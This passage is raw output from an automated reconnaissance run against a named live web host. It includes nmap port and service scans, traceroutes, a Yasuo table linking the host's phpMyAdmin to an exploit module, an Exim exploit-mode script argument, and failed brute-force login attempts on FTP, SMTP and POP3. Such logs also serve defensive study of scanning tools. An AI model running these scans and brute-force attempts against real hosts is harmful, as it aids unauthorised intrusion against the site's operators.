2851No exact OS matches for host (test conditions non-ideal).
2852Uptime guess: 9.921 days (since Wed Feb 19 04:35:37 2020)
2853Network Distance: 25 hops
2854TCP Sequence Prediction: Difficulty=264 (Good luck!)
2855IP ID Sequence Generation: All zeros
2856
2857TRACEROUTE (using port 3306/tcp)
2858HOP RTT ADDRESS
28591 130.27 ms 10.203.15.1
28602 ...
28613 132.85 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
28624 132.84 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
28635 135.43 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
28646 161.06 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
28657 162.30 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
28668 256.05 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
28679 254.09 ms be12497.ccr41.par01.atlas.cogentco.com (154.54.56.130)
286810 248.13 ms be3627.ccr41.jfk02.atlas.cogentco.com (66.28.4.197)
286911 245.31 ms be2806.ccr41.dca01.atlas.cogentco.com (154.54.40.106)
287012 256.65 ms be2112.ccr41.atl01.atlas.cogentco.com (154.54.7.158)
287113 272.50 ms be2687.ccr41.iah01.atlas.cogentco.com (154.54.28.70)
287214 279.87 ms be2690.ccr42.iah01.atlas.cogentco.com (154.54.28.130)
287315 296.06 ms be2928.ccr21.elp01.atlas.cogentco.com (154.54.30.162)
287416 302.96 ms be2929.ccr31.phx01.atlas.cogentco.com (154.54.42.65)
287517 312.91 ms be3271.ccr41.lax04.atlas.cogentco.com (154.54.42.102)
287618 317.17 ms be3271.ccr41.lax04.atlas.cogentco.com (154.54.42.102)
287719 317.93 ms 38.104.210.82
287820 476.08 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
287921 479.68 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
288022 478.47 ms 124.158.230.70
288123 486.85 ms 111.90.128.46
288224 486.91 ms 172.16.16.2
288325 484.16 ms web16.support-emilid.com (111.90.145.39)
2884
2885NSE: Script Post-scanning.
2886Initiating NSE at 02:42
2887Completed NSE at 02:42, 0.00s elapsed
2888Initiating NSE at 02:42
2889Completed NSE at 02:42, 0.00s elapsed
2890#########################################################################################################################
2891--------------------------------------------------------
2892<<<Yasuo discovered following vulnerable applications>>>
2893--------------------------------------------------------
2894+------------+---------------------------------------+--------------------------------------------------+-----------+-----------+
2895| App Name | URL to Application | Potential Exploit | Username | Password |
2896+------------+---------------------------------------+--------------------------------------------------+-----------+-----------+
2897| phpMyAdmin | https://111.90.145.39:443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | Not Found | Not Found |
2898+------------+---------------------------------------+--------------------------------------------------+-----------+-----------+
2899########################################################################################################################
2900Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 01:58 EST
2901Warning: 111.90.145.39 giving up on port because retransmission cap hit (2).
2902Nmap scan report for web16.support-emilid.com (111.90.145.39)
2903Host is up (0.33s latency).
2904Not shown: 458 closed ports, 4 filtered ports
2905Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
2906PORT STATE SERVICE VERSION
290721/tcp open ftp Pure-FTPd
2908| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
2909| Not valid before: 2019-05-03T09:49:26
2910|_Not valid after: 2046-09-17T09:49:26
2911|_ssl-date: 2020-02-29T06:56:27+00:00; -4m17s from scanner time.
291225/tcp open smtp Exim smtpd 4.92
2913| smtp-commands: server98222.domain.local Hello web16.support-emilid.com [45.132.192.65], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
2914|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
2915| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
2916| Not valid before: 2016-05-13T00:34:32
2917|_Not valid after: 2043-09-28T00:34:32
2918|_ssl-date: 2020-02-29T06:56:27+00:00; -4m17s from scanner time.
291953/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
2920| dns-nsid:
2921|_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
292280/tcp open ssl/http Apache/2
2923|_http-server-header: Apache/2
2924|_http-title: Site doesn't have a title (text/html).
2925110/tcp open pop3 Dovecot DirectAdmin pop3d
2926|_pop3-capabilities: PIPELINING STLS AUTH-RESP-CODE UIDL RESP-CODES TOP USER SASL(PLAIN) CAPA
2927| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
2928| Not valid before: 2016-05-13T00:34:32
2929|_Not valid after: 2043-09-28T00:34:32
2930|_ssl-date: 2020-02-29T06:56:25+00:00; -4m17s from scanner time.
2931111/tcp open rpcbind 2-4 (RPC #100000)
2932| rpcinfo:
2933| program version port/proto service
2934| 100000 2,3,4 111/tcp rpcbind
2935| 100000 2,3,4 111/udp rpcbind
2936| 100000 3,4 111/tcp6 rpcbind
2937| 100000 3,4 111/udp6 rpcbind
2938| 100024 1 35598/tcp status
2939| 100024 1 43746/tcp6 status
2940| 100024 1 48690/udp6 status
2941|_ 100024 1 56252/udp status
2942143/tcp open imap Dovecot imapd
2943|_imap-capabilities: listed IDLE STARTTLS ID capabilities more ENABLE AUTH=PLAINA0001 LOGIN-REFERRALS have IMAP4rev1 LITERAL+ post-login Pre-login OK SASL-IR
2944| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
2945| Not valid before: 2016-05-13T00:34:32
2946|_Not valid after: 2043-09-28T00:34:32
2947|_ssl-date: 2020-02-29T06:56:26+00:00; -4m17s from scanner time.
2948443/tcp open ssl/ssl Apache httpd (SSL-only mode)
2949|_http-server-header: Apache/2
2950|_http-title: 400 Bad Request
2951| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
2952| Not valid before: 2019-05-03T09:49:26
2953|_Not valid after: 2046-09-17T09:49:26
2954|_ssl-date: 2020-02-29T06:56:25+00:00; -4m17s from scanner time.
2955465/tcp open ssl/smtp Exim smtpd 4.92
2956|_smtp-commands: server98222.domain.local Hello web16.support-emilid.com [45.132.192.65], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, HELP,
2957| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
2958| Not valid before: 2016-05-13T00:34:32
2959|_Not valid after: 2043-09-28T00:34:32
2960|_ssl-date: 2020-02-29T06:56:24+00:00; -4m17s from scanner time.
2961587/tcp open smtp Exim smtpd 4.92
2962| smtp-commands: server98222.domain.local Hello web16.support-emilid.com [45.132.192.65], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
2963|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
2964| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
2965| Not valid before: 2016-05-13T00:34:32
2966|_Not valid after: 2043-09-28T00:34:32
2967|_ssl-date: 2020-02-29T06:56:25+00:00; -4m17s from scanner time.
2968993/tcp open ssl/imap Dovecot imapd
2969| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
2970| Not valid before: 2016-05-13T00:34:32
2971|_Not valid after: 2043-09-28T00:34:32
2972|_ssl-date: 2020-02-29T06:56:24+00:00; -4m17s from scanner time.
2973995/tcp open ssl/pop3 Dovecot DirectAdmin pop3d
2974| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
2975| Not valid before: 2016-05-13T00:34:32
2976|_Not valid after: 2043-09-28T00:34:32
2977|_ssl-date: 2020-02-29T06:56:24+00:00; -4m17s from scanner time.
29782222/tcp open http DirectAdmin httpd 1.59.5 (Registered to Shinjiru Technology Sdn. Bhd.)
2979|_http-title: DirectAdmin Login
2980|_http-trane-info: Problem with XML parsing of /evox/about
29813306/tcp open mysql MySQL (unauthorized)
2982Aggressive OS guesses: Linux 2.6.32 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 - 3.1 (94%), Linux 2.6.32 - 2.6.39 (94%), Linux 2.6.39 (94%), Linux 3.10 (94%), Linux 3.2 (94%), HP P2000 G3 NAS device (93%), Linux 3.8 (93%), Linux 2.6.32 - 3.10 (92%)
2983No exact OS matches for host (test conditions non-ideal).
2984Network Distance: 25 hops
2985Service Info: Host: server98222.domain.local; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
2986
2987Host script results:
2988|_clock-skew: mean: -4m17s, deviation: 0s, median: -4m17s
2989
2990TRACEROUTE (using port 21/tcp)
2991HOP RTT ADDRESS
29921 129.31 ms 10.203.15.1
29932 ...
29943 132.79 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
29954 132.68 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
29965 135.88 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
29976 157.68 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
29987 162.75 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
29998 250.74 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
30009 248.58 ms be12497.ccr41.par01.atlas.cogentco.com (154.54.56.130)
300110 247.98 ms be3627.ccr41.jfk02.atlas.cogentco.com (66.28.4.197)
300211 245.75 ms be2806.ccr41.dca01.atlas.cogentco.com (154.54.40.106)
300312 263.07 ms be2112.ccr41.atl01.atlas.cogentco.com (154.54.7.158)
300413 275.51 ms be2687.ccr41.iah01.atlas.cogentco.com (154.54.28.70)
300514 295.55 ms be2928.ccr21.elp01.atlas.cogentco.com (154.54.30.162)
300615 298.71 ms be2928.ccr21.elp01.atlas.cogentco.com (154.54.30.162)
300716 316.89 ms be2932.ccr42.lax01.atlas.cogentco.com (154.54.45.162)
300817 318.95 ms be3360.ccr41.lax04.atlas.cogentco.com (154.54.25.150)
300918 313.92 ms 38.104.210.82
301019 480.83 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
301120 482.06 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
301221 485.68 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
301322 480.86 ms 124.158.230.70
301423 493.83 ms 111.90.128.46
301524 496.05 ms 172.16.16.2
301625 496.06 ms web16.support-emilid.com (111.90.145.39)
3017########################################################################################################################
3018Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:01 EST
3019Nmap scan report for web16.support-emilid.com (111.90.145.39)
3020Host is up (0.32s latency).
3021Not shown: 19 closed ports, 1 filtered port
3022Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
3023PORT STATE SERVICE VERSION
302453/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
302553/udp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
3026| dns-nsid:
3027|_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
302868/udp open|filtered dhcpc
302988/udp open|filtered kerberos-sec
3030137/udp open|filtered netbios-ns
3031138/udp open|filtered netbios-dgm
3032161/udp open|filtered snmp
3033389/udp open|filtered ldap
3034Aggressive OS guesses: Linux 2.6.32 (95%), Linux 2.6.32 - 3.1 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 - 2.6.39 (94%), Linux 2.6.39 (94%), Linux 3.10 (94%), Linux 3.2 (94%), HP P2000 G3 NAS device (93%), Linux 3.5 (93%), Linux 3.8 (93%)
3035No exact OS matches for host (test conditions non-ideal).
3036Network Distance: 25 hops
3037Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
3038
3039TRACEROUTE (using port 53/tcp)
3040HOP RTT ADDRESS
30411 134.60 ms 10.203.15.1
30422 ...
30433 131.43 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
30444 136.17 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
30455 142.11 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
30466 160.00 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
30477 161.48 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
30488 254.65 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
30499 250.34 ms be12497.ccr41.par01.atlas.cogentco.com (154.54.56.130)
305010 248.16 ms be3627.ccr41.jfk02.atlas.cogentco.com (66.28.4.197)
305111 249.95 ms be2806.ccr41.dca01.atlas.cogentco.com (154.54.40.106)
305212 260.36 ms be2112.ccr41.atl01.atlas.cogentco.com (154.54.7.158)
305313 274.59 ms be2687.ccr41.iah01.atlas.cogentco.com (154.54.28.70)
305414 273.83 ms be2690.ccr42.iah01.atlas.cogentco.com (154.54.28.130)
305515 293.92 ms be2928.ccr21.elp01.atlas.cogentco.com (154.54.30.162)
305616 303.38 ms be2929.ccr31.phx01.atlas.cogentco.com (154.54.42.65)
305717 314.80 ms be2931.ccr41.lax01.atlas.cogentco.com (154.54.44.86)
305818 318.09 ms be3271.ccr41.lax04.atlas.cogentco.com (154.54.42.102)
305919 480.55 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
306020 480.53 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
306121 480.73 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
306222 475.33 ms 124.158.230.70
306323 487.12 ms 111.90.128.46
306424 490.11 ms 172.16.16.2
306525 485.37 ms web16.support-emilid.com (111.90.145.39)
3066########################################################################################################################
3067Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:05 EST
3068NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
3069NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
3070NSE: [ftp-brute] passwords: Time limit 3m00s exceeded.
3071Nmap scan report for web16.support-emilid.com (111.90.145.39)
3072Host is up (0.32s latency).
3073
3074PORT STATE SERVICE VERSION
307521/tcp open ftp Pure-FTPd
3076| ftp-brute:
3077| Accounts: No valid accounts found
3078|_ Statistics: Performed 1232 guesses in 191 seconds, average tps: 7.9
3079Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3080Aggressive OS guesses: Linux 2.6.32 (95%), Linux 2.6.32 - 3.1 (95%), Linux 3.5 (95%), Linux 3.8 (95%), Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.2 (95%), Linux 3.11 (94%), Linux 3.1 (94%)
3081No exact OS matches for host (test conditions non-ideal).
3082Network Distance: 25 hops
3083
3084TRACEROUTE (using port 21/tcp)
3085HOP RTT ADDRESS
30861 130.21 ms 10.203.15.1
30872 ...
30883 133.70 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
30894 130.01 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
30905 135.80 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
30916 156.61 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
30927 159.58 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
30938 251.08 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
30949 248.69 ms be12497.ccr41.par01.atlas.cogentco.com (154.54.56.130)
309510 247.71 ms be3627.ccr41.jfk02.atlas.cogentco.com (66.28.4.197)
309611 249.51 ms be2806.ccr41.dca01.atlas.cogentco.com (154.54.40.106)
309712 263.28 ms be2112.ccr41.atl01.atlas.cogentco.com (154.54.7.158)
309813 276.20 ms be2687.ccr41.iah01.atlas.cogentco.com (154.54.28.70)
309914 290.07 ms be2927.ccr21.elp01.atlas.cogentco.com (154.54.29.222)
310015 302.88 ms be2930.ccr32.phx01.atlas.cogentco.com (154.54.42.77)
310116 312.32 ms be2932.ccr42.lax01.atlas.cogentco.com (154.54.45.162)
310217 318.52 ms be2932.ccr42.lax01.atlas.cogentco.com (154.54.45.162)
310318 319.22 ms be3360.ccr41.lax04.atlas.cogentco.com (154.54.25.150)
310419 318.99 ms 38.104.210.82
310520 481.15 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
310621 477.89 ms 61.11.210.114
310722 481.13 ms 61.11.210.114
310823 482.91 ms 111.90.128.46
310924 487.73 ms 172.16.16.2
311025 483.11 ms web16.support-emilid.com (111.90.145.39)
3111########################################################################################################################
3112Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:09 EST
3113NSE: [smtp-brute] usernames: Time limit 3m00s exceeded.
3114NSE: [smtp-brute] usernames: Time limit 3m00s exceeded.
3115NSE: [smtp-brute] passwords: Time limit 3m00s exceeded.
3116Nmap scan report for web16.support-emilid.com (111.90.145.39)
3117Host is up (0.32s latency).
3118
3119PORT STATE SERVICE VERSION
312025/tcp open smtp Exim smtpd 4.92
3121| smtp-brute:
3122| Accounts: No valid accounts found
3123|_ Statistics: Performed 901 guesses in 182 seconds, average tps: 4.6
3124| smtp-commands: server98222.domain.local Hello web16.support-emilid.com [45.132.192.65], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
3125|_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
3126| smtp-enum-users:
3127|_ Couldn't find any accounts
3128|_smtp-open-relay: SMTP RSET: failed to receive data: connection closed
3129| smtp-vuln-cve2010-4344:
3130| Exim version: 4.92
3131| Exim heap overflow vulnerability (CVE-2010-4344):
3132| Exim (CVE-2010-4344): NOT VULNERABLE
3133| Exim privileges escalation vulnerability (CVE-2010-4345):
3134| Exim (CVE-2010-4345): NOT VULNERABLE
3135|_ To confirm and exploit the vulnerabilities, run with --script-args='smtp-vuln-cve2010-4344.exploit'
3136Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3137Aggressive OS guesses: Linux 2.6.32 (95%), Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.2 (95%), Linux 2.6.32 - 3.1 (94%), Linux 3.11 (94%), Linux 3.8 (94%), Linux 3.1 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%)
3138No exact OS matches for host (test conditions non-ideal).
3139Network Distance: 25 hops
3140Service Info: Host: server98222.domain.local
3141
3142TRACEROUTE (using port 25/tcp)
3143HOP RTT ADDRESS
31441 130.89 ms 10.203.15.1
31452 ...
31463 129.93 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
31474 133.82 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
31485 135.43 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
31496 155.70 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
31507 168.22 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
31518 255.47 ms be12488.ccr42.lon13.atlas.cogentco.com (130.117.51.41)
31529 258.31 ms be12489.ccr42.par01.atlas.cogentco.com (154.54.57.70)
315310 258.48 ms be2318.ccr32.bio02.atlas.cogentco.com (154.54.61.117)
315411 258.10 ms be2332.ccr41.iad02.atlas.cogentco.com (154.54.85.245)
315512 250.80 ms be3084.ccr42.dca01.atlas.cogentco.com (154.54.30.65)
315613 264.94 ms be2113.ccr42.atl01.atlas.cogentco.com (154.54.24.222)
315714 287.08 ms be2927.ccr21.elp01.atlas.cogentco.com (154.54.29.222)
315815 299.97 ms be2930.ccr32.phx01.atlas.cogentco.com (154.54.42.77)
315916 314.89 ms be2932.ccr42.lax01.atlas.cogentco.com (154.54.45.162)
316017 316.36 ms be3360.ccr41.lax04.atlas.cogentco.com (154.54.25.150)
316118 314.35 ms 38.104.210.82
316219 481.19 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
316320 481.37 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
316421 481.48 ms 61.11.210.114
316522 484.32 ms 61.11.210.114
316623 484.24 ms 111.90.128.46
316724 486.83 ms 111.90.128.46
316825 481.40 ms web16.support-emilid.com (111.90.145.39)
3169########################################################################################################################
3170Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:15 EST
3171Nmap scan report for web16.support-emilid.com (111.90.145.39)
3172Host is up (0.38s latency).
3173
3174PORT STATE SERVICE VERSION
317553/tcp open domain ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
3176|_dns-fuzz: Server didn't response to our probe, can't fuzz
3177| dns-nsec-enum:
3178|_ No NSEC records found
3179| dns-nsec3-enum:
3180|_ DNSSEC NSEC3 not supported
3181| dns-nsid:
3182|_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
3183Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3184Aggressive OS guesses: Linux 2.6.32 (95%), Linux 2.6.32 - 3.1 (95%), Linux 3.8 (95%), Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.2 (95%), Linux 3.5 (94%), Linux 3.1 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%)
3185No exact OS matches for host (test conditions non-ideal).
3186Network Distance: 26 hops
3187Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
3188
3189Host script results:
3190| dns-blacklist:
3191| SPAM
3192|_ l2.apews.org - SPAM
3193| dns-brute:
3194|_ DNS Brute-force hostnames: No results.
3195
3196TRACEROUTE (using port 53/tcp)
3197HOP RTT ADDRESS
31981 129.82 ms 10.203.15.1
31992 ...
32003 130.44 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
32014 133.84 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
32025 134.91 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
32036 153.85 ms be2281.ccr41.ham01.atlas.cogentco.com (154.54.63.1)
32047 166.74 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
32058 252.39 ms be12488.ccr42.lon13.atlas.cogentco.com (130.117.51.41)
32069 260.74 ms be12489.ccr42.par01.atlas.cogentco.com (154.54.57.70)
320710 257.00 ms be2318.ccr32.bio02.atlas.cogentco.com (154.54.61.117)
320811 253.75 ms be2332.ccr41.iad02.atlas.cogentco.com (154.54.85.245)
320912 268.39 ms be2113.ccr42.atl01.atlas.cogentco.com (154.54.24.222)
321013 275.37 ms be2690.ccr42.iah01.atlas.cogentco.com (154.54.28.130)
321114 297.17 ms be2928.ccr21.elp01.atlas.cogentco.com (154.54.30.162)
321215 301.95 ms be2930.ccr32.phx01.atlas.cogentco.com (154.54.42.77)
321316 311.40 ms be2932.ccr42.lax01.atlas.cogentco.com (154.54.45.162)
321417 318.10 ms be3360.ccr41.lax04.atlas.cogentco.com (154.54.25.150)
321518 316.71 ms 38.104.210.82
321619 483.38 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
321720 478.38 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
321821 479.77 ms 61.11.210.114
321922 481.79 ms 124.158.230.70
322023 486.17 ms 111.90.128.46
322124 483.38 ms 172.16.16.2
322225 487.39 ms 172.16.16.2
322326 481.79 ms web16.support-emilid.com (111.90.145.39)
3224########################################################################################################################
3225Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:16 EST
3226Nmap scan report for web16.support-emilid.com (111.90.145.39)
3227Host is up (0.36s latency).
3228
3229PORT STATE SERVICE VERSION
323068/tcp closed dhcpc
323168/udp closed dhcpc
3232Too many fingerprints match this host to give specific OS details
3233Network Distance: 25 hops
3234
3235TRACEROUTE (using port 68/tcp)
3236HOP RTT ADDRESS
32371 130.41 ms 10.203.15.1
32382 ...
32393 133.30 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
32404 129.37 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
32415 134.96 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
32426 155.08 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
32437 168.41 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
32448 258.54 ms be12488.ccr42.lon13.atlas.cogentco.com (130.117.51.41)
32459 255.15 ms be12489.ccr42.par01.atlas.cogentco.com (154.54.57.70)
324610 258.59 ms be3628.ccr42.jfk02.atlas.cogentco.com (154.54.27.169)
324711 258.16 ms be2332.ccr41.iad02.atlas.cogentco.com (154.54.85.245)
324812 254.49 ms be3084.ccr42.dca01.atlas.cogentco.com (154.54.30.65)
324913 278.18 ms be2690.ccr42.iah01.atlas.cogentco.com (154.54.28.130)
325014 293.42 ms be2927.ccr21.elp01.atlas.cogentco.com (154.54.29.222)
325115 302.27 ms be2929.ccr31.phx01.atlas.cogentco.com (154.54.42.65)
325216 314.61 ms be2931.ccr41.lax01.atlas.cogentco.com (154.54.44.86)
325317 316.95 ms be3271.ccr41.lax04.atlas.cogentco.com (154.54.42.102)
325418 317.96 ms 38.104.210.82
325519 481.98 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
325620 486.41 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
325721 482.21 ms 61.11.210.114
325822 483.50 ms 61.11.210.114
325923 483.44 ms 124.158.230.70
326024 485.02 ms 172.16.16.2
326125 483.86 ms web16.support-emilid.com (111.90.145.39)
3262#######################################################################################################################
3263HTTP/1.1 200 OK
3264Date: Sat, 29 Feb 2020 07:13:27 GMT
3265Server: Apache/2
3266Last-Modified: Fri, 03 May 2019 09:49:26 GMT
3267ETag: "2c-587f8aa8fdb43"
3268Accept-Ranges: bytes
3269Content-Length: 44
3270Vary: User-Agent
3271Content-Type: text/html
3272
3273HTTP/1.1 200 OK
3274Date: Sat, 29 Feb 2020 07:13:28 GMT
3275Server: Apache/2
3276Last-Modified: Fri, 03 May 2019 09:49:26 GMT
3277ETag: "2c-587f8aa8fdb43"
3278Accept-Ranges: bytes
3279Content-Length: 44
3280Vary: User-Agent
3281Content-Type: text/html
3282########################################################################################################################
3283Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:17 EST
3284NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
3285NSE: [pop3-brute] usernames: Time limit 3m00s exceeded.
3286NSE: [pop3-brute] passwords: Time limit 3m00s exceeded.
3287Nmap scan report for web16.support-emilid.com (111.90.145.39)
3288Host is up (0.49s latency).
3289
3290PORT STATE SERVICE VERSION
3291110/tcp open pop3 Dovecot DirectAdmin pop3d
3292| pop3-brute:
3293| Accounts: No valid accounts found
3294|_ Statistics: Performed 205 guesses in 196 seconds, average tps: 0.9
3295|_pop3-capabilities: AUTH-RESP-CODE CAPA PIPELINING TOP UIDL USER RESP-CODES SASL(PLAIN) STLS
3296Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3297Aggressive OS guesses: Linux 2.6.32 (95%), Linux 2.6.32 - 3.1 (95%), Linux 3.8 (95%), Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.2 (95%), Linux 3.11 (94%), Linux 3.5 (94%), Linux 3.1 (94%)
3298No exact OS matches for host (test conditions non-ideal).
3299Network Distance: 25 hops
3300
3301TRACEROUTE (using port 110/tcp)
3302HOP RTT ADDRESS
33031 131.73 ms 10.203.15.1
33042 ...
33053 131.29 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
33064 131.32 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
33075 135.02 ms be3740.ccr21.sto03.atlas.cogentco.com (154.54.60.190)
33086 157.41 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
33097 166.61 ms be2816.ccr42.ams03.atlas.cogentco.com (154.54.38.209)
33108 251.15 ms be12488.ccr42.lon13.atlas.cogentco.com (130.117.51.41)
33119 257.97 ms be12489.ccr42.par01.atlas.cogentco.com (154.54.57.70)
331210 254.23 ms be2318.ccr32.bio02.atlas.cogentco.com (154.54.61.117)
331311 254.29 ms be2807.ccr42.dca01.atlas.cogentco.com (154.54.40.110)
331412 265.06 ms be2113.ccr42.atl01.atlas.cogentco.com (154.54.24.222)
331513 268.06 ms be2113.ccr42.atl01.atlas.cogentco.com (154.54.24.222)
331614 290.63 ms be2927.ccr21.elp01.atlas.cogentco.com (154.54.29.222)
331715 297.95 ms be2929.ccr31.phx01.atlas.cogentco.com (154.54.42.65)
331816 313.94 ms be2931.ccr41.lax01.atlas.cogentco.com (154.54.44.86)
331917 314.98 ms be3271.ccr41.lax04.atlas.cogentco.com (154.54.42.102)
332018 313.31 ms 38.104.210.82
332119 477.57 ms ae-2.cr-gw-2-sin-pip.sg.globaltransit.net (124.158.224.17)
332220 481.94 ms ae-1.cr-gw-2-kul-pip.my.globaltransit.net (61.11.212.57)
332321 477.76 ms 61.11.210.114
332422 481.95 ms 61.11.210.114
332523 481.38 ms 124.158.230.70
332624 487.39 ms 172.16.16.2
332725 486.42 ms web16.support-emilid.com (111.90.145.39)
